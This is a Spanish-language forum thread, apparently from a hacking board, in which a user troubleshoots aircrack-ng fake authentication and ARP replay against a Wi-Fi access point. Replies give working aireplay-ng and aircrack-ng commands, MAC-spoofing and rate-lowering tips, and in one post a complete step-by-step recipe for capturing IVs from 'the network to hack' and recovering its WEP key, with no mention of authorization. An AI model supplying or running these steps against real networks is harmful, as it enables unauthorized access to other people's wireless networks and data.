Autor
|
Tema: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng) (Leído 38,887 veces)
|
Carloswaldo
Traductor
Moderador Global
Nos reservamos el derecho de ban.
|
A1 es el Ataque 1 (Asociación falsa).
|
|
|
|
|
|
|
Casidiablo
|
¿Y no es eso lo que estoy tratando de hacer? O sea, la opción -1 del comando aireplay-ng...
|
|
|
|
|
|
|
heaviloto
|
hola, perdon me e colado, es que con eso de A1 y A3 me lio un poco, xd xd xd xd, queria decir esto exactamente,
- aireplay-ng -3 -b (bssid del AP) -h (bessid del que este conectado) wlan0
prueba a poner eso despues de intentar asociarte
un saludo
|
|
|
|
larga vida al rock&roll heaviloto
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver (leño)
|
|
|
Casidiablo
|
Muestra esto, y solo esto: Read 83454 packets (got 0 ARP requests and 0 ACKs), sent 0 packets... Van aumentando el número de paquetes pero no los ARP ni ACK...
|
|
|
|
|
|
|
Casidiablo
|
Si hago todo usando la MAC del AP, me sale esto: aireplay-ng -3 -b 00:1C:10:08:39:15 -h 00:1C:10:08:39:15 wlan0 15:47:10 Waiting for beacon frame (BSSID: 00:1C:10:08:39:15) on channel 6 Saving ARP requests in replay_arp-0116-154710.cap You should also start airodump-ng to capture replies. Read 18688 packets (got 0 ARP requests and 6 ACKs), sent 0 packets...(0 pps) Bueno, siempre y cuando en otra consola tenga corriendo el ataque 1... cada vez que en el fake auth aparece esto: Sending Authentication Request (Open System) [ACK], el número de ACKs crece en el ataque 3 (tiene sentido). Pero aún así, no he podido hacer nada. Muchas gracias por su ayuda.
|
|
|
|
|
|
|
heaviloto
|
hola, te suben los datas en el airodump?, si es asi, un poco de paciencia, no siempre es a la preimera, y segun el estado de animo del router, xd xd xd xd xd
un saludo
|
|
|
|
larga vida al rock&roll heaviloto
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver (leño)
|
|
|
fuenteRea
Volver a ser un niño
|
bajale la rate a la tarjeta ifconfig rate 1M, si tienes un portatil prueba a cambiarte de sitio o apaga y enciende el router porque algunas veces son muy cabezones estos router, un saludo!! PD: haz el ataque1 de esta manera--> aircrack-ng -1 30 -a BSSID -e ESSID -h BSSID wlan0
|
|
« Última modificación: 17 Enero 2009, 04:18 am por thedoctor77 »
|
|
Una rosa es una rosa...
|
|
|
Spanslus9mm
802.11 // 802.15.4 // 802.16
|
Buenas, te voy a decir como lo veo yo: - No se seguro si lo estas haciendo, pero es importante cambiarte la MAC de tu tarjeta (pero no a la del AP) y usar esa misma MAC falseada en la opción -h. -Con el 0 le estas diciendo que se intente reautentificar continuamente. Dependiendo del modelo de router esto no puede ser adecuado, prueba otros valores como 30 o 20 (se reautentifica cada 30 o 20 segundos) -Bajar el rate a 1M como dice thedoctor77 -Puedes probar a añadir la opción -o 1 (Envía solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs) -Y para terminar hay algunos routers preparados para no responder a este ataque, si pruebas todo lo que te han sugerido y no logras nada quizá no lo puedas hacer. Saludos
|
|
|
|
Una muy breve historia de todo: El hidrógeno es un gas ligero e inodoro que, con el tiempo suficiente se convierte en gente
|
|
|
Lapiz_tola
|
hola yo tengo el programa backtrack 3y mi tarjeta de red es atheros y tengo los pasos a seguir de ese programa y si funciona perfectamente es pero que te sirva de algo PARA CAMBIAR A MODO MONITOR primera terminal modprobe -r ath_pci
modprobe ath_pci autocreate=monitor
iwconfig (ath1 es mi trjeta de red) mode monitor
airodump-ng (ath1 es mi tarjeta de red)
iwconfig (ath1 es mi tarjeta de red) rate 1M channel (el de la red a hackear)
ifconfig (ath1 es mi tarjeta de red) hw ether 00:11:22:33:44:55
airodump-ng --ivs --bssid (mac-de la que vas a hackear ) -w (cualquier nombre del archivo) -c (canal de la red) (ath1 es mi tarjeta de red)
segunda terminal
aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)
tercera terminal
aireplay-ng -3 -b (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)
para sair de las terminales es ctrl:c para recuperar la clave en la primera terminal le pones
aircrack-ng (nombre del archivo)-01.ivs los datos que vienen entre parentesis son los que tienes que cambiar ya cambiados no le pongas los( ) espero y te sirva saludos
|
|
|
|
|
|
|
fuenteRea
Volver a ser un niño
|
Lapiz_tola que dices?, ese no es el problema, leete bien el hilo y no varies el problema, un saludo!!
|
|
|
|
Una rosa es una rosa...
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
"Phishing" with Google.com - creating realistic fake webpages
Hacking
|
TinKode
|
1
|
3,593
|
22 Marzo 2011, 15:56 pm
por eskuku
|
|
|
Destacado analista: "Lo siento, pero Flash no funciona bien en Android"
Noticias
|
wolfbcn
|
0
|
2,096
|
4 Junio 2011, 02:04 am
por wolfbcn
|
|
|
"Call" no funciona con textbox pero, sí, con "cualquiertexto"
« 1 2 »
Programación Visual Basic
|
usuario oculto
|
12
|
6,472
|
16 Julio 2011, 17:05 pm
por usuario oculto
|
|
|
Fake Auth (By Force) no me funciona con tarjeta con Chip RTL81817L !! Ayuda !!!
Hacking Wireless
|
kikola2k
|
2
|
3,273
|
23 Octubre 2012, 00:36 am
por flacc
|
|